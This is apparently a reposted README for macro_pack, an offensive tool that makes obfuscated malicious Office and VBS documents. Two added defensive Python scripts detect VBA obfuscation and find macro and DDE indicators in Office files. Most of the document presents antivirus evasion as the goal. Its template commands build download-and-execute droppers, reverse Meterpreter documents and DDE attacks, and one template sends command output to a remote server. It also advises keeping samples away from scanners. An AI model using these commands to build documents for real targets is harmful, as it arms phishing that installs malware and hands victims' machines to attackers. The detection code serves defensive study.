macro_pack – Tool Used To Automatize Obfuscation And Generation Of MS Office Documents For Pentest, Demo, And Social Engineering Assessments

macro_pack is a tool used to automatize the obfuscation and generation of legacy formats such as MS Office documents or VBS-like formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. macro_pack simplifies antimalware bypass and automates the process from VBA generation to final Office document generation.

It is very simple to use:

  • No configuration
  • Everything can be done using a single line of code
  • Generation of the majority of Office formats and VBS-based formats
  • Advanced VBA macro attacks as well as DDE attacks

The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools, as it can read its input from stdin and produce quiet output suitable for piping into another tool.

This tool is written in Python 3 and works on both Linux and Windows platforms.

Note: A Windows platform with the right MS Office applications installed is required for automatic Office document generation and for the trojan features.

Obfuscation

The tool applies various obfuscation techniques, all automatic. The obfuscation feature is compatible with all formats that can be generated by macro_pack, whether VBA or VBS based.
Basic obfuscation (-o option) includes:

  • Renaming functions
  • Renaming variables
  • Removing spaces
  • Removing comments
  • Encoding strings

Note that the main goal of macro_pack obfuscation is not to prevent reverse engineering; it is to prevent antivirus detection.
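Each transformation in the list above leaves a visible trace in the resulting source, which is what a defender's static triage can key on. The following added example (not part of macro_pack, and not the project's own code) scores a VBA module on those traces: machine-looking identifiers, stripped comments and indentation, and strings assembled from Chr()/StrReverse() calls. The two samples and the thresholds are constructed for illustration and are assumptions rather than tuned detection values.

```python
"""Heuristic scoring of VBA source for the obfuscation traits listed above.

Added defender-side example; it is not part of macro_pack. It looks for the
visible side effects of the listed transformations (machine-generated
identifiers, stripped comments and indentation, strings assembled from
Chr()/StrReverse() calls) and returns a score with reasons. The thresholds
are illustrative assumptions, not tuned detection values.
"""
import re

# Patterns for the traits (assumptions about what obfuscated VBA tends to look like)
_DECL_RE = re.compile(r"^[ \t]*(?:Public[ \t]+|Private[ \t]+)?(?:Sub|Function)[ \t]+(\w+)", re.I | re.M)
_DIM_RE = re.compile(r"\bDim[ \t]+(\w+)", re.I)
_COMMENT_RE = re.compile(r"^[ \t]*'|\bRem\b", re.I | re.M)
_CHR_RE = re.compile(r"\bChrW?[ \t]*\([ \t]*\d+[ \t]*\)", re.I)
_STRREV_RE = re.compile(r"\bStrReverse[ \t]*\(", re.I)


def _looks_random(name: str) -> bool:
    """Flag identifiers that look machine-generated rather than chosen by a human."""
    if len(name) < 8:
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    # Natural identifiers carry a fair share of vowels; random ones often carry few,
    # or alternate case in a way no naming convention produces.
    return vowels / len(name) < 0.2 or bool(re.search(r"[a-z][A-Z][a-z][A-Z]", name))


def score_vba(source: str) -> dict:
    """Return {'score': int, 'reasons': [str]} for a VBA module given as text."""
    reasons = []
    score = 0
    lines = [ln for ln in source.splitlines() if ln.strip()]

    identifiers = _DECL_RE.findall(source) + _DIM_RE.findall(source)
    random_ids = [n for n in identifiers if _looks_random(n)]
    if identifiers and len(random_ids) / len(identifiers) >= 0.5:
        score += 3
        reasons.append(f"{len(random_ids)}/{len(identifiers)} identifiers look machine-generated")

    if len(lines) >= 10 and not _COMMENT_RE.search(source):
        score += 1
        reasons.append("no comments in a non-trivial module")

    if len(lines) >= 4 and not any(ln[0] in " \t" for ln in lines):
        score += 1
        reasons.append("indentation stripped from every line")

    chr_calls = len(_CHR_RE.findall(source))
    if chr_calls >= 5:
        score += 3
        reasons.append(f"{chr_calls} Chr()/ChrW() calls assembling strings")

    if _STRREV_RE.search(source):
        score += 1
        reasons.append("StrReverse() used on string data")

    return {"score": score, "reasons": reasons}


# Constructed samples: a plain macro as a developer would write it, and the same
# "Hello world" behaviour after the transformations listed above (hand-made here).
CLEAN_SAMPLE = """' Hello macro: shows a message box to the user
Sub AutoOpen()
    Dim message As String
    message = "Hello from the author"
    MsgBox message
End Sub
"""

OBFUSCATED_SAMPLE = """Sub qXzPwlvKdMrt()
Dim hGtRbqwZpLn As String
hGtRbqwZpLn = Chr(72) & Chr(101) & Chr(108) & Chr(108) & Chr(111) & Chr(32) & StrReverse(Chr(100) & Chr(108) & Chr(114) & Chr(111) & Chr(119))
MsgBox hGtRbqwZpLn
End Sub
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        verdict = score_vba(sample)
        print(f"{label}: score={verdict['score']} reasons={verdict['reasons']}")
```

The clean sample scores 0 and the obfuscated one scores 8 under these thresholds. The point is not the numbers but the principle: the note above says the goal of the obfuscation is to evade antivirus signatures, and a scorer built on the structural traces of the transformations is exactly the kind of check a signature on the original payload text cannot provide.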

Generation

Macro Pack can generate several kinds of MS Office document and script formats. The format is guessed automatically from the given file extension. File generation is done using the option --generate or -G.
The Macro Pack pro version also allows trojaning existing files with the option --trojan or -T.

MS Office supported formats are:

  • MS Word 97 (.doc)
  • MS Word (.docm, .docx)
  • MS Excel 97 (.xls)
  • MS Excel (.xlsm)
  • MS PowerPoint (.pptm)
  • MS Visio 97 (.vsd)
  • MS Visio (.vsdm)
  • MS Project (.mpp)

Scripting (txt) supported formats are:

  • VBA text file (.vba)
  • VBS text file (.vbs)
  • Windows Script Host (.wsh)
  • Windows Script Components scriptlets (.wsc, .sct)
  • HTML Applications (.hta)

Note that all scripting formats can be generated on the Linux version of macro_pack as well.
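The Office 2007+ formats listed above (.docm, .docx, .xlsm, .pptm) are zip packages, so the indicators a generated document carries can be read without opening it in Office: a VBA project is a part named vbaProject.bin declared in [Content_Types].xml, and a Word DDE link (the DDE attack mentioned earlier on this page) is a DDE or DDEAUTO field instruction inside word/document.xml. The following added example (not macro_pack code) performs that triage; the three sample packages are constructed in memory with placeholder contents and are not real Office files.

```python
"""Static triage of OOXML Office containers for the indicators these formats carry.

Added defender-side example; it is not part of macro_pack. An Office 2007+
document (.docm, .docx, .xlsm, .pptm) is a zip package: a VBA project is
stored in a part named vbaProject.bin and declared in [Content_Types].xml,
and a Word DDE link is a field instruction (DDE / DDEAUTO) in
word/document.xml. The sample packages below are constructed in memory
with placeholder contents; they are not real Office files.
"""
import io
import re
import zipfile

# Field instructions Word resolves as DDE links (the DDE attack the page refers to)
_DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)
# The VBA project part; Office stores it next to the main document part
_VBA_PART_RE = re.compile(r"(^|/)vbaProject\.bin$", re.I)
# Field codes live in w:instrText runs or in the w:instr attribute of w:fldSimple
_FIELD_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>|<w:fldSimple[^>]*\bw:instr=\"([^\"]*)\"", re.S)


def triage_ooxml(data: bytes) -> dict:
    """Return the macro/DDE indicators found in an OOXML package given as bytes."""
    result = {"is_zip": False, "has_vba_project": False,
              "macro_enabled_content_type": False, "dde_fields": []}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result  # legacy .doc/.xls (OLE2) or not an Office file at all
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["has_vba_project"] = any(_VBA_PART_RE.search(n) for n in names)
        if "[Content_Types].xml" in names:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            result["macro_enabled_content_type"] = "macroEnabled" in content_types
        for name in names:
            if not name.endswith(".xml"):
                continue
            xml = zf.read(name).decode("utf-8", "replace")
            for match in _FIELD_RE.finditer(xml):
                instr = (match.group(1) or match.group(2) or "").strip()
                if _DDE_RE.search(instr):
                    result["dde_fields"].append((name, instr))
    return result


def _build_package(parts: dict) -> bytes:
    """Build a zip in memory from {part name: content}; used only for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


_W_NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
_CT_NS = 'xmlns="http://schemas.openxmlformats.org/package/2006/content-types"'
CT_MACRO = (f'<Types {_CT_NS}>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
            '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>')
CT_PLAIN = (f'<Types {_CT_NS}>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>')
DOC_PLAIN = f'<w:document {_W_NS}><w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>'
# A field carrying a DDEAUTO instruction; application and arguments are placeholders.
DOC_DDE = (f'<w:document {_W_NS}><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           '<w:r><w:instrText xml:space="preserve"> DDEAUTO placeholder_app "placeholder_args" </w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')

# Constructed samples: a macro-enabled package, a macro-less package with a DDE field, and a clean one.
MACRO_DOCM = _build_package({"[Content_Types].xml": CT_MACRO, "word/document.xml": DOC_PLAIN,
                             "word/vbaProject.bin": b"placeholder vba project bytes"})
DDE_DOCX = _build_package({"[Content_Types].xml": CT_PLAIN, "word/document.xml": DOC_DDE})
CLEAN_DOCX = _build_package({"[Content_Types].xml": CT_PLAIN, "word/document.xml": DOC_PLAIN})

if __name__ == "__main__":
    for label, pkg in (("macro-enabled", MACRO_DOCM), ("dde", DDE_DOCX), ("clean", CLEAN_DOCX)):
        print(label, triage_ooxml(pkg))
```

Two caveats for anyone turning this into a real check. Word may split one field instruction across several w:instrText runs, so a production parser should reassemble the text between the begin and separate/end w:fldChar markers before matching rather than inspecting each run on its own. The 97-2003 formats on the list (.doc, .xls, .vsd) are OLE2 compound files, not zips; this function deliberately reports them as non-zip, and a tool such as oletools' olevba is the usual way to extract VBA from those.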

Ethical use

The macro_pack tool shall only be used by pentesters, security researchers, or other people with learning purposes. I condemn all use of security tools for unethical actions (whether these are legal or illegal). I know this will not prevent usage by malicious people and that is why not all features are publicly released.

About pro mode…

You may notice that not all parts of macro_pack are available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing” the process and I do not want them available to all the script kiddies out there. The pro mode includes features such as:

  • Advanced antimalware bypass
  • VBOM security bypass
  • Self-decoding VBA
  • MS Office persistence
  • Trojaning existing MS Office documents
  • Lateral movement using DCOM objects
  • Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90

For now I do not plan to release or sell this pro version; however, if you are really interested I can share the pro binary in the following case:

  • You significantly contribute to macro_pack on GitHub + I need to know your identity

Run/Install

Run Windows binary

  • Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  • Download the binary on a PC with genuine Microsoft Office installed.
  • Open a console, cd to the binary directory and call the binary, simple as that!

Install from sources

Download and install dependencies:

Note: For Windows, you also need to manually download pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/

The tool is in Python 3, so just start it with your python3 install. ex:

If you want to produce a standalone exe using pyinstaller:

  • Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/
  • Double-click on the “build.bat” script on a Windows machine.
  • The resulting macro_pack.exe will be inside the bin directory.

Some examples

macro_pack community

Obfuscate the VBA file generated by msfvenom and put the result in a new VBA file.

Obfuscate an Empire stager VBA file and generate an MS Word document:

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

Create a Word 97 document containing an obfuscated VBA reverse meterpreter payload inside a shared folder:

Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template

Execute calc.exe via Dynamic Data Exchange (DDE) attack

Download and execute file via powershell using Dynamic Data Exchange (DDE) attack

Generate obfuscated Meterpreter reverse TCP VBS file and run it

Generate an obfuscated HTA file which executes “systeminfo” and returns the result to another macro_pack listening on 192.168.0.5

Generate obfuscated Meterpreter reverse https TCP SCT file and run it

macro_pack pro

  • Trojan the existing shared “report.xlsm” file with a dropper. Use anti-AV and anti-debug features.

  • Generate a Word file containing a self-encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.

  • Trojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.

  • Execute a macro on a remote PC using DCOM

All available options

General options:

macro_pack Pro only:

Template usage

Templates can be called using -t, --template=TEMPLATE_NAME combined with other options.
Here are all the available templates.

HELLO

Just print a hello message and awareness about macros.
Give this template the name or email of the author.
-> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm

CMD

Execute a command line and send the result to a remote http server.
Give this template the server url and the command to run.
-> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t CMD -o -G cmd.doc

DROPPER

Download and execute a file.
Give this template the file url and the target file path
-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xls

DROPPER2

Download and execute a file. File attributes are also set to system, read-only, and hidden.
Give this template the file url and the target file path.
-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER2 -o -G dropper.xlsm

DROPPER_PS

Download and execute a PowerShell script using rundll32 (to bypass blocked powershell.exe).
Note: This payload will download PowerShdll from GitHub.
Give this template the url of the PowerShell script you want to run.
-> Example: echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

DROPPER_DLL

Download a DLL with another extension and run it using Office VBA
-> Example, load meterpreter DLL using Office:

METERPRETER

Meterpreter reverse TCP template using MacroMeter by Cn33liz.
This template is a CSharp Meterpreter stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.
-> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm
Recommended msfconsole options (use exploit/multi/handler):

WEBMETER

Meterpreter reverse TCP template using VbsMeter by Cn33liz.
This template is a CSharp Meterpreter stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.
-> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsd
Recommended msfconsole options (use exploit/multi/handler):

EMBED_EXE

Combined with the --embed option, it will drop and execute (hidden) the embedded file.
Optionally you can give the template the path where the file should be extracted.
If the extraction path is not given, the file will be extracted with a random name in the current path.
-> Example1: macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs
-> Example2: echo "path\\to\newcalc.exe" | macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.doc

Efficiency

The various features were tested against locally installed antimalware solutions as well as online services. I ran multiple tests with several kinds of payloads and macro_pack features. A majority of antivirus will be evaded by the simple “obfuscate” option. Features available in pro mode generally ensure full AV bypass.

Example with Empire VBA stager:

Here are the results of the NoDistribute scanner for the regular Empire VBA stager:

Here are the results with the macro_pack -o (--obfuscate) option:

Warning:

Do not submit your samples to online scanners (e.g. VirusTotal). It's the best way to break your stealth macro. I also suggest you do not submit to non-reporting sites such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.

Relevant resources

Blog posts about MS Office security:

  • http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
  • http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
  • https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
  • https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
  • https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/

Other useful links:

  • https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
  • https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run a PowerShell script with the PowerShdll VBA implementation)
  • https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)
  • https://github.com/EmpireProject/Empire
  • https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
  • https://www.metasploit.com/
  • https://github.com/Cn33liz/MacroMeter
  • https://github.com/khr0x40sh/MacroShop

Download macro_pack